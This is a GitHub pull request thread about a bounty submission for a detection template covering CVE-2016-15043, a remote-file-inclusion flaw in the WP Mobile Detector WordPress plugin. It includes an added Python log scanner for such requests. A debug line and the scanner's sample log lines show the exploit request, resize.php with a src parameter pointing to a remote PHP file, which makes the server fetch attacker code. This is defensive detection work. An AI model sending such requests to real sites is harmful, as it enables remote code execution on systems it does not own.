@KrE80r
Contributor

@KrE80r KrE80r commented Jan 2, 2026

/claim #14673

Summary

  • Add detection template for CVE-2016-15043 (WP Mobile Detector <= 3.5 RFI to RCE)

Template Validation

  • Validated with vulnerable host (WP Mobile Detector 3.5)
  • Validated with clean WordPress (no false positives)

Debug Output

[CVE-2016-15043:word-1] [http] [critical] http://localhost:8888/wp-content/plugins/wp-mobile-detector/resize.php?src=http://xxx.oast.pro/test.php

OOB callback confirmed - server fetched external URL and cached to /wp-content/plugins/wp-mobile-detector/cache/.

Test Environment

Vulnerable environment shared privately

References

@Akokonunes
Contributor

Hi @KrE80r

Thanks for the submission! However, there's a template logic issue - the second request's matcher checking interactsh_protocol: http doesn't make sense since it's fetching from the local cache directory, not triggering a new callback. Only the first request should check interactsh_protocol. More importantly, you mentioned a Docker environment is "available privately upon request" but haven't actually sent the vulnerable target details or setup instructions to templates@projectdiscovery.io as required by the bounty program.

Please send the vulnerable environment for validation and fix the matcher logic.
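
A defender-side view of the two requests discussed above, as an added example that is not part of this PR or of the template under review: it scans access-log lines for resize.php requests whose src is a remote URL, then for later requests to the plugin's cache/ directory for the same file name. The log format, sample lines, host names and the assumption that the cached file keeps the remote file's base name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

PLUGIN = "/wp-content/plugins/wp-mobile-detector/"
# Common/combined access-log prefix: ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.4 - - [02/Jan/2026:02:09:00 +0000] "GET ' + PLUGIN
    + 'resize.php?src=/wp-content/uploads/banner.png HTTP/1.1" 200 5120',
    '203.0.113.7 - - [02/Jan/2026:02:10:01 +0000] "GET ' + PLUGIN
    + 'resize.php?src=http://files.example.net/test.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [02/Jan/2026:02:10:03 +0000] "GET ' + PLUGIN
    + 'cache/test.php HTTP/1.1" 200 12',
    '198.51.100.4 - - [02/Jan/2026:02:11:00 +0000] "GET ' + PLUGIN
    + 'cache/banner.png HTTP/1.1" 200 5120',
    '198.51.100.9 - - [02/Jan/2026:02:12:00 +0000] "GET ' + PLUGIN
    + 'resize.php?src=http%3A%2F%2Ffiles.example.net%2Fa.php HTTP/1.1" 200 0',
]

def scan(lines):
    """Return (line_no, kind, client_ip, detail) for each suspicious request."""
    findings = []
    fetched = set()  # base names of remote URLs handed to resize.php
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        url = urlsplit(m["target"])
        path = unquote(url.path)
        if path == PLUGIN + "resize.php":
            # parse_qs percent-decodes, so encoded src values are covered too.
            for src in parse_qs(url.query).get("src", []):
                remote = urlsplit(src)
                if remote.scheme in ("http", "https") and remote.netloc:
                    name = remote.path.rsplit("/", 1)[-1]
                    if name:
                        fetched.add(name)
                    findings.append((n, "remote-src", m["ip"], src))
        elif path.startswith(PLUGIN + "cache/"):
            # Assumption: the cached copy keeps the remote file's base name.
            if path.rsplit("/", 1)[-1] in fetched:
                findings.append((n, "cache-hit", m["ip"], path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the resize.php request makes the server reach out to a remote host; the cache/ request is served locally, which is the distinction the review comment draws for the matchers.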

@KrE80r
Contributor Author

KrE80r commented Jan 2, 2026

> Hi @KrE80r
>
> Thanks for the submission! However, there's a template logic issue - the second request's matcher checking interactsh_protocol: http doesn't make sense since it's fetching from the local cache directory, not triggering a new callback. Only the first request should check interactsh_protocol. More importantly, you mentioned a Docker environment is "available privately upon request" but haven't actually sent the vulnerable target details or setup instructions to templates@projectdiscovery.io as required by the bounty program.
>
> Please send the vulnerable environment for validation and fix the matcher logic.

Thanks @Akokonunes for the comment, I made the change and shared the env privately.

@D3nverNg
Contributor

D3nverNg commented Jan 2, 2026

Hi @Akokonunes, I previously opened PR #14674 before this one, but it hasn’t been reviewed yet. Could you please let me know how the team’s PR review process works, and why this PR was reviewed earlier than mine?

@KrE80r
Contributor Author

KrE80r commented Jan 2, 2026

I will just put the timeline of commits on both PRs here for @Akokonunes and the team to review:

2026-01-02T02:04:14Z | PR 14674 | commit f607906 | initial commit, please verify template details and relevance to the exploit

2026-01-02T02:31:45Z | PR 14675 | commit 0f9d9c4 | This PR was created

2026-01-02T03:21:25Z | PR 14674 | b050ed6 | PR 14674 template completely modified

@KrE80r KrE80r closed this Jan 2, 2026
@KrE80r KrE80r reopened this Jan 2, 2026
@Akokonunes Akokonunes added Done Ready to merge and removed waiting for more info labels Jan 6, 2026
@Akokonunes
Contributor

Hi @KrE80r

Thank you for participating in the Bounty Claim Program. The template in PR #14674 meets all the requirements, including providing a testable lab/instance to verify the template over email. As a result, we’ve decided to accept that submission and will be closing this one out.

@Akokonunes Akokonunes closed this Jan 6, 2026